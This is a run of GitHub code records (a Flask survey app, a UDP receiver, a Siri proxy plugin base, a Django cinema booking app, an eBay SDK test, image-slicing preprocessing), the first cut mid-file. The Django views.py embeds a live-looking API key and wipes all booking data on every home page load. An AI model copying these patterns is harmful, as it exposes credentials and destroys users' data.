window=label_pin)\ncanvas.pack()\n\nroot.mainloop()\n","repo_name":"jyotiraditya09/label","sub_path":"label_license.py","file_name":"label_license.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34878944776","text":"from flask import Flask, render_template, request, redirect, url_for\r\nfrom sqlalchemy import func\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nimport sqlite3\r\n\r\nlist_of_questions = [(\"вам нравятся русские буквы?\",), (\"вам нравятся латинские буквы?\",)]\r\n\r\ndb = sqlite3.connect(r'test.db')\r\ncur = db.cursor()\r\n\r\n\r\ncur.execute(\r\n \"\"\"CREATE TABLE answers (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n q1 INTEGER,\r\n q2 INTEGER )\r\n \"\"\")\r\n\r\ncur.execute(\r\n \"\"\"CREATE TABLE questions (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n text TEXT\r\n )\"\"\")\r\n\r\n\r\ncur.execute(\r\n \"\"\"CREATE TABLE\r\n user ( \r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n gender TEXT,\r\n education TEXT,\r\n age INTEGER )\"\"\")\r\n\r\nfor smth in list_of_questions:\r\n cur.execute(\r\n '''INSERT into questions (text) VALUES (?) ''', smth\r\n )\r\n\r\ndb.commit()\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'\r\ndb = SQLAlchemy(app)\r\n\r\nclass User(db.Model):\r\n __tablename__ = 'user' # table name\r\n id = db.Column(db.Integer, primary_key=True) # column name = special type (data type, primary key)\r\n gender = db.Column(db.Text)\r\n education = db.Column(db.Text)\r\n age = db.Column(db.Integer)\r\n\r\n\r\nclass Questions(db.Model):\r\n __tablename__ = 'questions'\r\n id = db.Column(db.Integer, primary_key=True)\r\n text = db.Column(db.Text)\r\n\r\n\r\nclass Answers(db.Model):\r\n __tablename__ = 'answers'\r\n id = db.Column(db.Integer, primary_key=True)\r\n q1 = db.Column(db.Integer)\r\n q2 = db.Column(db.Integer)\r\n\r\n@app.route('/')\r\ndef base():\r\n with open(\"intro.txt\", \"r\", encoding='utf-8') as f:\r\n content = f.read().split('\\n')\r\n return render_template(\"base.html\", content=content)\r\n\r\n@app.route('/questions')\r\ndef question_page():\r\n questions = Questions.query.all() # table_name.query.take_all()\r\n return render_template(\r\n 'questions.html',\r\n questions=questions\r\n )\r\n\r\n\r\n@app.route('/process', methods=['get'])\r\ndef answer_process():\r\n # if the request is empty, send the user back to take the survey\r\n if not request.args:\r\n return redirect(url_for('question_page'))\r\n\r\n # get the answer values\r\n gender = request.args.get('gender')\r\n education = request.args.get('education')\r\n age = request.args.get('age')\r\n\r\n # write them to the database\r\n user = User(\r\n age=age,\r\n gender=gender,\r\n education=education\r\n )\r\n db.session.add(user)\r\n db.session.commit()\r\n\r\n # refresh the user so that the answer is saved with the same id\r\n db.session.refresh(user)\r\n\r\n # do the same with the answer\r\n q1 = request.args.get('q1')\r\n q2 = request.args.get('q2')\r\n answer = Answers(\r\n id=user.id,\r\n q1=q1,\r\n q2=q2\r\n )\r\n db.session.add(answer)\r\n db.session.commit()\r\n\r\n return 'спасибо! за участие'
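\r\n\r\n# Added note (not in the original): the aggregates in /stats below are the\r\n# ORM form of plain SQL, e.g. SELECT AVG(age), MIN(age), MAX(age) FROM user.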
\r\n\r\n\r\n@app.route('/stats')\r\ndef stats():\r\n # collect the values in one dict (so we do not pass each one to render_template separately)\r\n all_info = {}\r\n\r\n age_stats = db.session.query(\r\n func.avg(User.age), # average age AVG(user.age)\r\n func.min(User.age), # minimum age MIN(user.age)\r\n func.max(User.age) # maximum age MAX(user.age)\r\n ).one() # take a single result (there will be exactly one anyway)\r\n\r\n all_info['age_mean'] = age_stats[0]\r\n all_info['age_min'] = age_stats[1]\r\n all_info['age_max'] = age_stats[2]\r\n\r\n # this is a simple query, we can ask the table directly\r\n all_info['total_count'] = User.query.count() # SELECT COUNT(age) FROM user\r\n\r\n # SELECT AVG(q1) FROM answers\r\n all_info['q1_mean'] = db.session.query(func.avg(Answers.q1)).one()[0]\r\n\r\n # SELECT q1 FROM answers\r\n q1_answers = db.session.query(Answers.q1).all()\r\n\r\n # SELECT AVG(q2) FROM answers\r\n all_info['q2_mean'] = db.session.query(func.avg(Answers.q2)).one()[0]\r\n\r\n # SELECT q2 FROM answers\r\n q2_answers = db.session.query(Answers.q2).all()\r\n\r\n return render_template('results.html', all_info=all_info)\r\nif __name__ == '__main__':\r\n app.run()","repo_name":"tpeyrolnik/letters_app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75382340648","text":"# __author__ = 'Deliang Yang'\n# __create__ = '2018.01.11'\n\nimport socket\n\nUDP_IP = '127.0.0.1'\nUDP_PORT = 9234\n\ndef run():\n SUM = 0\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind(('', UDP_PORT))\n counter = 0\n random = ''\n\n while True:\n SUM +=1\n data, addr = sock.recvfrom(1024)\n msg = str(data,encoding = 'utf-8')\n sum = int(msg[0:3])\n number = int(msg[4:7])\n\n if msg[8:11] != random:\n counter = 1\n else:\n counter +=1\n if len(data)<16:\n print('=============')\n print('Rcv msg:', msg, '\\n--from', addr, 'Len:',len(data))\n else:\n print('Rcv msg:', msg[0:17] ,'\\n--from', addr, 'Len:', len(data))\n print('Total:',sum,'\\tIndex:',number,'\\tPercent:', (counter/sum*100),'%')\n print('--No.%d'%SUM)\n print('===========================================')\n random = msg[8:11]\n# sock.sendto(MSG, (UDP_IP, UDP_PORT))\n\nif __name__ == '__main__':\n run()\n","repo_name":"LanternD/NB-Scope","sub_path":"Software/udp-server-for-nb-iot/udp_receive.py","file_name":"udp_receive.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"8002511979","text":"from types import GeneratorType\n\nfrom pysiriproxy.constants import Keys\nfrom pysiriproxy.plugins.speechRules import isSpeechRule, speechRuleMatches, \\\n matches\nfrom pysiriproxy.plugins.directions import isDirectionFilter, \\\n directionsMatch, From_iPhone, From_Server\nfrom pysiriproxy.plugins.objectClasses import isObjectClassFilter, \\\n objectClassesMatch, SpeechPacket, SpeechRecognized, StartRequest\n\nfrom pyamp.logging import Colors\nfrom pyamp.util import getStackTrace\n\n\nclass BasePlugin:\n '''The BasePlugin class encapsulates the basic features of a plugin.\n This class provides the ability to load the set of filter functions,\n and then process them with a received object and a received direction.\n\n A filter function is created by decorating a class function with either\n the From_iPhone decorator, or the From_Server decorator. 
These filters\n will be processed in the event that an object is received from the given\n decorated direction. These functions can have any publicly visible name\n (i.e., one that does not start with __).\n\n Example::\n\n class Plugin(BasePlugin):\n @From_iPhone\n def exampleFilter(self, obj):\n self.log.debug(\"This will process all iPhone objects!\")\n\n Filter functions can also be created to catch a specific object type by\n using specific object class decorators. The object class decorators are\n defined in the :mod:`.objectClasses` module.\n\n Example::\n\n class Plugin(BasePlugin):\n @StartRequest\n @From_iPhone\n def exampleFilter(self, obj):\n self.log.debug(\"This will process iPhone StartRequest objects!\")\n\n In the above example, the *exampleFilter* function will be called in the\n event that a StartRequest object is received from the iPhone. Custom\n decorators can be created by calling the\n :func:`.objectClasses.createDecorator` function.\n\n Speech rules are created in a similar manner to object filters. Two\n decorators exist which allow a speech rule function to be called in the\n event that a given string matches the recognized speech, or if a regular\n expression matches the recognized speech.\n\n Example::\n\n class Plugin(BasePlugin):\n @matches(\"Test Siri Proxy\")\n def testMatch(self, text):\n print \"Matched the recognized speech!\"\n\n @regex(\".*Siri Proxy.*\")\n def testRegex(self, text):\n print \"Matched a regular expression!\"\n\n The *@matches* decorator takes a string which it will compare to the\n recognized speech. A function using this decorator will be called in the\n event that the recognized speech matches the given string (it is case\n insensitive).\n\n The *@regex* decorator takes a regular expression which it will use to\n match the recognized speech. A function using this decorator will be\n called in the event that the regular expression matches the recognized\n speech (it is case insensitive).\n\n Custom speech rule decorators can be created by creating a subclass of the\n :class:`.speechRules.Rule` class, and then calling the\n :func:`.speechRules.createDecorator` function with the \n :class:`.speechRules.Rule` subclass.\n\n '''\n\n customCommandMap = {}\n '''The customCommandMap property defines a dictionary of custom command\n names mapped to the concrete plugin class function names that get called\n when the custom command is received from the iPhone.\n\n '''\n\n # Store the names of various properties that concrete plugins can override\n __NameProp = \"name\"\n __LogColorProp = \"logColor\"\n\n def __init__(self, manager, logger):\n '''\n * manager -- The PluginManager object\n * logger -- The logger\n\n '''\n self.__manager = manager\n\n # Force the name property to exist\n name = self.__forceProperty(self.__NameProp)\n\n # Get the logColor property which is optional\n logColor = self.__getProperty(self.__LogColorProp,\n Colors.Foreground.White)\n\n self.log = logger.get(name, color=logColor)\n self.__clearFilters()\n self.__clearSpeechRules()\n\n # Load the filters and speech rules for this plugin\n self.__loadFiltersAndRules()\n\n self.init()\n\n def getName(self):\n '''Get the name of this Plugin.'''\n return self.__getProperty(self.__NameProp)\n\n ##### Functions concrete plugins should override #####\n\n def init(self):\n '''Called after the BasePlugin is created.\n\n .. 
note:: This function can be overridden by concrete plugins.\n\n '''\n pass\n\n ##### Process filters for this plugin #####\n\n def processFilters(self, obj, direction):\n '''Process the filters for this Plugin.\n\n .. note:: This function should return False if the object should be\n dropped, return None if the object is ignored by this\n filter, or return the new object corresponding to the\n response.\n\n * commandName -- The name of the object\n * direction -- The direction the object traveled to be received\n\n '''\n self.log.debug(\"Processing %d filters\" % len(self.__filters), level=10)\n\n # Process all of the filters for this plugin\n for filterFunction in self.__filters:\n # Determine if this filter function applies to the current\n # object or direction\n if self.__filterApplies(filterFunction, direction, obj):\n # Filters return None when they ignore the object, otherwise\n # they have some effect on the current object\n try:\n filterName = filterFunction.__name__\n self.log.debug(\"Processing filter: %s\" % filterName,\n level=10)\n\n response = filterFunction(obj, direction)\n if response is not None:\n return response\n except:\n self.log.error(\"Error in filter [%s]\" % \\\n filterFunction.__name__)\n self.log.error(getStackTrace())\n\n # Object is ignored by this plugin\n return None\n\n @From_iPhone\n @StartRequest\n def customCommand(self, obj, direction):\n '''Create a default object filter for the start request command\n received from the iPhone. This allows the plugins to define a set\n of custom command names and map them to specific callback functions.\n\n * commandName -- The name of the object\n * direction -- The direction the object traveled to be received\n\n '''\n # Get the command name from the start request object\n commandName = self.__getStartRequestCommand(obj)\n\n functionName = self.customCommandMap.get(commandName)\n\n if functionName is not None:\n customFn = getattr(self, functionName, None)\n if customFn is not None:\n return customFn(obj)\n\n return None\n\n ##### Functions for processing speech rules #####\n\n def processSpeechRules(self, text):\n '''Process all of the speech rules for the recognized speech text.\n\n * text -- The recognized speech text\n\n '''\n self.log.debug(\"Processing %d speech rules for [%s]\" % \\\n (len(self.__speechRules), text), level=10)\n\n # Process all of the speech rules for this plugin\n for ruleFunction in self.__speechRules:\n # If the given speech rule applies, then apply\n # it to the given text\n if self.__speechRuleApplies(ruleFunction, text):\n try:\n self.log.debug(\"Processing speech rule: %s\" % \\\n ruleFunction.__name__, level=10)\n\n # Speech rule functions have no return value, make sure\n # to pass it the lowercase version of the text\n resp = ruleFunction(text.lower())\n\n # Only apply the first matched speech rule\n return True if type(resp) != GeneratorType else resp\n except:\n self.log.error(\"Error in speech rule [%s]\" % \\\n ruleFunction.__name__)\n self.log.error(getStackTrace())\n\n # The text was not matched by any speech rules\n return False\n\n ##### Functions passed through to the PluginManager #####\n\n def showDirections(self, directionsType, source, destination,\n utterance=None):\n '''Create a directions object and display it to the iPhone user.\n\n * directionsType -- The type of directions to show\n * source -- The starting location\n * destination -- The destination location\n * utterance -- The utterance to include\n\n '''\n self.__manager.showDirections(directionsType, source, 
destination,\n utterance=utterance)\n\n def showDrivingDirections(self, source, destination, utterance=None):\n '''Create driving directions object and display it to the iPhone user.\n\n * source -- The starting location\n * destination -- The destination location\n * utterance -- The utterance to include\n\n '''\n self.__manager.showDrivingDirections(source, destination,\n utterance=utterance)\n\n def showWalkingDirections(self, source, destination, utterance=None):\n '''Create walking directions object and display it to the iPhone user.\n\n * source -- The starting location\n * destination -- The destination location\n * utterance -- The utterance to include\n\n '''\n self.__manager.showWalkingDirections(source, destination,\n utterance=utterance)\n\n def showPublicTransitDirections(self, source, destination, utterance=None):\n '''Create public tranportation directions object and display it to\n the iPhone user.\n\n * source -- The starting location\n * destination -- The destination location\n * utterance -- The utterance to include\n\n '''\n self.__manager.showPublicTransitDirections(source, destination,\n utterance=utterance)\n\n def makeView(self, views):\n '''Create a view and send it to the iPhone user.\n\n * views -- The list of views to create\n\n '''\n self.__manager.makeView(views)\n\n def ask(self, question, spoken=None):\n '''Command Siri to ask the user a question.\n\n * question -- The question to ask\n * spoken -- The text Siri will say\n\n '''\n self.__manager.ask(question, spoken)\n\n def resetContext(self):\n '''Reset the context.'''\n self.__manager.resetContext()\n\n def say(self, text, spoken=None):\n '''Command Siri to speak a piece of text.\n\n * text -- The text that Siri will display\n * spoken -- The text that Siri will speak\n\n '''\n self.__manager.say(text, spoken)\n\n def completeRequest(self):\n '''Complete a request to Siri.\n\n .. 
note:: This function should always be called by speech rules\n otherwise Siri will continue to spin.\n\n '''\n self.__manager.completeRequest()\n\n ##### Private functions for loading filters #####\n\n def __clearFilters(self):\n '''Clear the filters for this plugin.'''\n self.__filters = []\n\n def __clearSpeechRules(self):\n '''Clear the speech rules for this plugin.'''\n self.__speechRules = []\n\n def __loadFiltersAndRules(self):\n '''Load all of the filters and speech rules for this Plugin.'''\n self.__clearFilters()\n self.__clearSpeechRules()\n\n # Traverse all of our functions\n for function in self.__getFunctions():\n # Handle a filter, or speech rule function accordingly\n if isDirectionFilter(function) or isObjectClassFilter(function):\n self.log.debug(\"Added filter [%s]\" % function.__name__,\n level=10)\n self.__filters.append(function)\n elif isSpeechRule(function):\n self.log.debug(\"Added speech rule [%s]\" % function.__name__,\n level=10)\n self.__speechRules.append(function)\n\n ##### Other private functions #####\n\n def __getFunctions(self):\n '''Return all of the functions for this class.'''\n # Filter out any builtin, and private functions\n attrs = filter(self.__isNotPrivateOrBuiltin, dir(self))\n\n # Get the objects for all of the class attributes\n objs = map(lambda attr: getattr(self, attr, None), attrs)\n\n # Filter out any non-existing attributes\n objs = filter(lambda obj: obj is not None, objs)\n\n # Now return only those that are functions\n return filter(lambda obj: hasattr(obj, \"__call__\"), objs)\n\n def __isNotPrivateOrBuiltin(self, attr):\n '''Determine if the given attribute is a private or builtin\n attribute name.\n\n * attr -- The name of the attribute\n\n '''\n return not attr.startswith(\"_\") and not attr.find(\"__\") != -1\n\n def __forceProperty(self, propName):\n '''Force the given property to exist.\n\n * propName -- The name of the property\n\n '''\n propValue = self.__getProperty(propName)\n\n # Check that the name property exists\n if propValue is None:\n raise Exception(\"Plugins must have a '%s' property!\" % propName)\n\n return propValue\n\n def __getProperty(self, propName, default=None):\n '''Get the value of the given property.\n \n * default -- The default value\n\n '''\n return getattr(self, propName, default)\n\n def __filterApplies(self, function, direction, obj):\n '''Determine if the given filter function applies to either the\n given direction or the class of the given object.\n\n * direction -- The direction\n * obj -- The object\n\n '''\n objectClass = obj.get('class')\n return directionsMatch(function, direction) and \\\n objectClassesMatch(function, objectClass)\n\n def __speechRuleApplies(self, function, text):\n '''Determine if the given speech rule function applies to\n the recognized text.\n\n * function -- The speech rule function\n * text -- The recognized text\n\n '''\n return speechRuleMatches(function, text)\n\n def __getStartRequestCommand(self, obj):\n '''Get the command name from the start request object.\n\n * obj -- The start request object\n\n '''\n utterance = None\n properties = obj.get(Keys.Properties)\n if properties is not None:\n utterance = properties.get(Keys.Utterance)\n\n return utterance\n","repo_name":"bponsler/pysiriproxy","sub_path":"pysiriproxy/plugins/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":15076,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"8002511979","text":"from django.shortcuts import 
render, redirect\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom home.models import Film, Showing, Ticket, Booking, TicketTypeQuantity\nfrom home.forms import BookingForm\nimport requests\nimport json\n\n# Create your views here.\ndef booking(request):\n if 'showing' not in request.GET:\n return redirect('/')\n\n # Get showing\n showing_id = request.GET['showing']\n showing = Showing.objects.get(id=showing_id)\n\n # Form submission\n if request.method == 'POST':\n form = BookingForm(request.POST, available_tickets=Ticket.objects.all())\n\n if form.is_valid():\n # Further validation \n # Check if there are enough seats + Seats > 0\n total_tickets = 0\n for field_name, quantity in form.cleaned_data.items():\n if field_name.startswith('ticket_'):\n total_tickets += quantity\n\n if total_tickets > showing.seats:\n form.add_error(None, 'Not enough seats available.')\n return render(request, 'booking.html', {'form': form, 'showing': showing})\n\n elif total_tickets == 0:\n form.add_error(None, 'You must select at least one ticket.')\n return render(request, 'booking.html', {'form': form, 'showing': showing})\n\n booking = Booking.objects.create(\n showing=showing,\n customer_name=form.cleaned_data['customer_name'],\n customer_email=form.cleaned_data['customer_email'],\n )\n \n # Create ticket type quantities for each ticket type the user booked\n for field_name, quantity in form.cleaned_data.items():\n if field_name.startswith('ticket_'):\n ticket_id = field_name.split('_')[1]\n ticket = Ticket.objects.get(id=ticket_id)\n ttq = TicketTypeQuantity.objects.create(ticket=ticket, quantity=quantity)\n booking.ticket_type_quantities.add(ttq)\n\n # Update showing seats & save booking\n showing.seats -= total_tickets\n showing.save()\n booking.save()\n return render(request, 'booking-confirmation.html', {'booking': booking})\n else:\n form = BookingForm(available_tickets=Ticket.objects.all())\n return render(request, 'booking.html', {'form': form, 'showing': showing})\n \n else: \n form = BookingForm(available_tickets=Ticket.objects.all())\n return render(request, 'booking.html', {'form': form, 'showing': showing})\n\n\ndef home(request):\n template = loader.get_template('home.html')\n\n # MAKE TEMP DATA\n makeExamples()\n\n films = Film.objects.all().prefetch_related('showings')\n \n # Get film posters by IMDB ID using an API\n for film in films:\n response = requests.get(f'https://api.themoviedb.org/3/find/{film.imdb}?api_key=d4c4c2d25e196ead918fc7080850a0d7&language=en-US&external_source=imdb_id')\n data = response.json()\n for category in data.keys():\n if len(data[category]) > 0:\n film.image_url = f\"https://image.tmdb.org/t/p/original{data[category][0]['poster_path']}\"\n film.backdrop_url = f\"https://image.tmdb.org/t/p/original{data[category][0]['backdrop_path']}\"\n film.save()\n\n # Serialize films\n serialized_films = [film_serializable(film) for film in films]\n context = {\n 'films': serialized_films,\n }\n\n return render(request, 'home.html', context)\n\n\ndef film_serializable(film):\n # Serialize the showings\n serialized_showings = [showing_serializable(showing) for showing in film.showings.all()]\n\n return {\n 'title': film.title,\n 'description': film.description,\n 'duration': film.duration,\n 'age_rating': film.age_rating,\n 'image_url': film.image_url,\n 'showings': serialized_showings,\n }\n\n\ndef showing_serializable(showing):\n return {\n 'id': showing.id,\n 'date': showing.date.strftime('%Y-%m-%d'),\n 'time': showing.time.strftime('%H:%M'),\n 
'seats': showing.seats\n }\n\n\ndef makeExamples(): \n # Delete all data before making new\n Film.objects.all().delete()\n Showing.objects.all().delete()\n Ticket.objects.all().delete()\n Booking.objects.all().delete()\n\n # Create tickets\n tickets = [\n Ticket(name=\"Adult\", price=7.50),\n Ticket(name=\"Child\", price=3.00),\n Ticket(name=\"Student\", price=5.00),\n ]\n\n Ticket.objects.bulk_create(tickets)\n\n # Create film + showings\n film = Film(title=\"The Owl House\", description=\"The Owl House follows Luz, a self-assured teenage girl who accidentally stumbles upon a portal to a magical world where she befriends a rebellious witch, Eda, and an adorably tiny warrior, King.\",\n duration=23, age_rating=9, imdb=\"tt8050756\")\n film.save()\n\n # Create list of showings\n showings = [\n Showing(film=film, date='2023-01-01', time='20:00', seats=60, screen=1),\n Showing(film=film, date='2023-01-02', time='16:00', seats=80, screen=2),\n Showing(film=film, date='2023-01-02', time='18:00', seats=20, screen=1),\n ]\n\n Showing.objects.bulk_create(showings)\n\n film = Film(title=\"Strange World\", description=\"The original action-adventure journeys deep into an uncharted and treacherous land where fantastical creatures await the legendary Clades, a family of explorers whose differences threaten to topple their latest - and by far - most crucial mission.\",\n duration=102, age_rating=12, imdb=\"tt10298840\")\n film.save()\n\n # Create list of showings\n showings = [\n Showing(film=film, date='2023-01-01', time='20:00', seats=100, screen=1),\n Showing(film=film, date='2023-01-01', time='21:00', seats=90, screen=2),\n ]\n\n Showing.objects.bulk_create(showings)\n \n film = Film(title=\"Glass Onion: A Knives Out Mystery\", description=\"Tech billionaire Miles Bron invites his friends for a getaway on his private Greek island. When someone turns up dead, Detective Benoit Blanc is put on the case.\",\n duration=139, age_rating=12, imdb=\"tt11564570\")\n film.save()\n\n showings = [\n Showing(film=film, date='2023-01-05', time='09:00', seats=100, screen=1),\n Showing(film=film, date='2023-01-05', time='12:00', seats=100, screen=1),\n ]\n Showing.objects.bulk_create(showings)\n\n film = Film(title=\"John Wick: Chapter 4\", description=\"John Wick uncovers a path to defeating The High Table. 
But before he can earn his freedom, Wick must face off against a new enemy with powerful alliances across the globe and forces that turn old friends into foes.\",\n duration=200, age_rating=14, imdb=\"tt10366206\")\n film.save()\n\n showings = [\n Showing(film=film, date='2023-01-05', time='10:00', seats=50, screen=3),\n ]\n Showing.objects.bulk_create(showings)\n\n film = Film(title=\"Top Gun: Maverick\", description=\"After thirty years, Maverick is still pushing the envelope as a top naval aviator, but must confront ghosts of his past when he leads TOP GUN's elite graduates on a mission that demands the ultimate sacrifice from those chosen to fly it.\",\n duration=130, age_rating=12, imdb=\"tt1745960\")\n film.save()\n\n showings = [\n Showing(film=film, date='2023-01-05', time='16:00', seats=20, screen=20),\n Showing(film=film, date='2023-01-06', time='16:00', seats=20, screen=20),\n Showing(film=film, date='2023-01-07', time='16:00', seats=50, screen=20),\n\n\n ]\n Showing.objects.bulk_create(showings)\n\n film = Film(title=\"The Batman\", description=\"When a sadistic serial killer begins murdering key political figures in Gotham, Batman is forced to investigate the city's hidden corruption and question his family's involvement.\",\n duration=176, age_rating=15, imdb=\"tt1877830\")\n film.save()\n\n showings = [\n Showing(film=film, date='2023-01-06', time='20:00', seats=60, screen=1),\n Showing(film=film, date='2023-01-07', time='16:00', seats=80, screen=2),\n Showing(film=film, date='2023-01-07', time='18:00', seats=20, screen=1),\n\n\n ]\n Showing.objects.bulk_create(showings)\n\n film = Film(title=\"Arcane\", description=\"Set in utopian Piltover and the oppressed underground of Zaun, the story follows the origins of two iconic League champions-and the power that will tear them apart.\",\n duration=360, age_rating=15, imdb=\"tt11126994\")\n film.save()\n\n showings = [\n Showing(film=film, date='2023-01-12', time='20:00', seats=60, screen=1),\n Showing(film=film, date='2023-01-12', time='16:00', seats=80, screen=2),\n ]\n Showing.objects.bulk_create(showings)\n\n film = Film(title=\"Wednesday\", description=\"Follows Wednesday Addams' years as a student, when she attempts to master her emerging psychic ability, thwart and solve the mystery that embroiled her parents.\",\n duration=360, age_rating=12, imdb=\"tt13443470\")\n film.save()\n\n showings = [\n Showing(film=film, date='2023-01-13', time='10:00', seats=60, screen=1),\n Showing(film=film, date='2023-01-13', time='14:00', seats=80, screen=2),\n ]\n Showing.objects.bulk_create(showings)\n","repo_name":"KayleeWilliams/UWEFlix","sub_path":"UWEFlix/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21419484158","text":"#this module is just to load the api key out of my .env file\n\nimport datetime\n\nimport os\nfrom ebaysdk.finding import Connection \nfrom ebaysdk.exception import ConnectionError\nfrom dotenv import load_dotenv\nload_dotenv()\nAPI_KEY= os.getenv('api_key')\n\n\nclass Ebay_22(object):\n def __init__(self, API_KEY):\n self.api_key = API_KEY\n \n def fetch(self):\n try:\n # the domain is on the sandbox version!! 
not the production one; the sandbox is just for testing \n api = Connection(domain = 'svcs.sandbox.ebay.com',appid=self.api_key, config_file=None)\n response = api.execute('findItemsAdvanced', {'keywords': 'legos'})\n print (response.reply)\n # print the results of the response list\n for item in response.reply.searchResult.item:\n print(f\"Title: {item.title}, Price: {item.sellingStatus.currentPrice.value}\")\n print(f\"Condition: {item.condition.conditionDisplayName}\")\n print(f\"Buy it now available: {item.listingInfo.buyItNowAvailable}\")\n #print(f\"Product ID: {item.productId}\") # this becomes interesting once I am on the production site\n \n # some basic AssertionError tests: if not working --> AssertionError\n assert(response.reply.ack == 'Success')\n assert(type(response.reply.timestamp) == datetime.datetime)\n assert(type(response.reply.searchResult.item) == list)\n\n item = response.reply.searchResult.item[0]\n assert(type(item.listingInfo.endTime) == datetime.datetime)\n assert(type(response.dict()) == dict)\n\n except ConnectionError as e:\n print(e)\n print(e.response.dict())\n\n\n def parse(self):\n pass\n\n\n#main driver\n\nif __name__ == '__main__':\n e = Ebay_22(API_KEY)\n e.fetch()\n e.parse()\n\n\n","repo_name":"h3g091/ebay-search-api","sub_path":"build_connection_and_test_api.py","file_name":"build_connection_and_test_api.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24232271835","text":"nums=[5,7,7,8,8,10]\n\ndef get1(n,target):\n counts={}\n for i in n:\n if i not in counts:\n counts[i]=1\n else:\n counts[i]+=1\n if target in counts:\n return counts[target]\n else:\n return 0\n\nprint(get1(nums,8))\n\n","repo_name":"liucheng2912/py","sub_path":"leecode/easy/2004/53排序数组中查找数字i出现的次数.py","file_name":"53排序数组中查找数字i出现的次数.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40911885790","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n'''\n@Project :Pytorch-UNet \n@File :dataprocess.py\n@Author :kuisu\n@Email :kuisu_dgut@163.com\n@Date :2022/3/23 18:44 \n'''\n# Match the original images with the binary segmentation masks and save them to the data folder\nimport os\nfrom PIL import Image\nimport numpy as np\nimport cv2\nfrom tqdm import tqdm\n\n# Crop a large image into small tiles with a sliding window\ndef sliceImage(image_path,output_file_name,output_dir):\n from sahi.slicing import slice_image\n slice_image_result, num_total_invalid_segmentation = slice_image(\n image=image_path,\n output_file_name=output_file_name,\n output_dir=output_dir,\n slice_height=256,\n slice_width=256,\n overlap_height_ratio=0.2,\n overlap_width_ratio=0.2,\n verbose=True\n )\n return slice_image_result,num_total_invalid_segmentation\n\n\ndef match_data(train_dir,mask_dir):\n # match masks with the original images\n count1,count2,count3,count4 = 0,0,0,0\n for image_name in tqdm(os.listdir(mask_dir)):\n if os.path.exists(os.path.join(train_dir, image_name)):\n mask = Image.open(os.path.join(mask_dir,image_name))\n image = Image.open(os.path.join(train_dir,image_name))\n mask = mask.copy().convert(\"L\")\n mask = mask.copy().convert(\"1\")\n mask = np.array(mask,dtype=np.uint8)*255\n if mask.max() == 255:\n mask_img = Image.fromarray(mask)\n mask_img.save(os.path.join(\"./data/masks/\",\"{}_mask.png\".format(image_name.split(\".\")[0])))\n image.save(os.path.join(\"./data/imgs\",\"{}.png\".format(image_name.split(\".\")[0])))\n if 'img1' in image_name:\n count1+=1\n elif \"img2\" in image_name:\n count2+=1\n elif 
\"img3\" in image_name:\n count3+=1\n elif \"img4\" in image_name:\n count4+=1\n else:\n print(\"{} not in train_dir\".format(image_name))\n print(\"img1: {}, img2:{}, img3: {}, img4:{}\".format(count1,count2,count3,count4))\n\n# Convert tif format to png\ndef tif2jpg(path,save_path):\n tif_list = [x for x in os.listdir(path) if x.endswith(\".tif\")] # list all tif images in the directory\n for num,i in enumerate(tif_list): # iterate over the list\n tifPath = os.path.join(path,i)\n lbp_1_8_real = cv2.imread(tifPath,-1)\n if \"mask\" in i:\n lbp_1_8_real*=255\n # read the tif image from the list\n # normalize to 0-255\n img_norm = np.zeros_like(lbp_1_8_real)\n real_show = cv2.normalize(lbp_1_8_real, dst=img_norm, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)\n save_image_path = os.path.join(save_path,i.split('.')[0]+\".jpg\")\n cv2.imwrite(save_image_path,real_show) # convert tif to jpg, keep the original name, save as grayscale\n\nif __name__ == '__main__':\n\n ## 1. convert tif to png\n # path = r\"D:\\dataset\\BGI_EXAM\\train_set\" # directory where the code lives\n # save_path = r\"D:\\dataset\\BGI_EXAM\\train_set\"\n # tif2jpg(path,save_path)\n\n\n # # 2. crop small tiles with a sliding window and filter out empty background masks\n # image_path = r\"D:\\dataset\\BGI_EXAM\\test_set\\171.jpg\"\n # output_file_name = \"171\"\n # output_dir = r\"D:\\dataset\\BGI_EXAM\\slices\\test\"\n # sliceImage(image_path, output_file_name, output_dir)\n\n # #3. match the cropped masks with the original images\n # train_dir = r\"D:\\dataset\\BGI_EXAM\\slices\\train2\"\n # mask_dir = r\"D:\\dataset\\BGI_EXAM\\slices\\mask2\"\n # match_data(train_dir,mask_dir)\n pass\n","repo_name":"kuisu-GDUT/pytorch-cell-UNet","sub_path":"dataprocess.py","file_name":"dataprocess.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"zh","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"72667066728","text":"text = input('Enter a number in exponential form: ')\nm = ''\nb = ''\nflag = True\nfor i in text:\n if i == 'e' or i == 'E':\n flag = False\n elif flag:\n m += i\n else:\n b += i\nprint(m, b)","repo_name":"chernyssshev/Skillbox","sub_path":"Skillbox/13. float 2/Практика/13.6 (4).py","file_name":"13.6 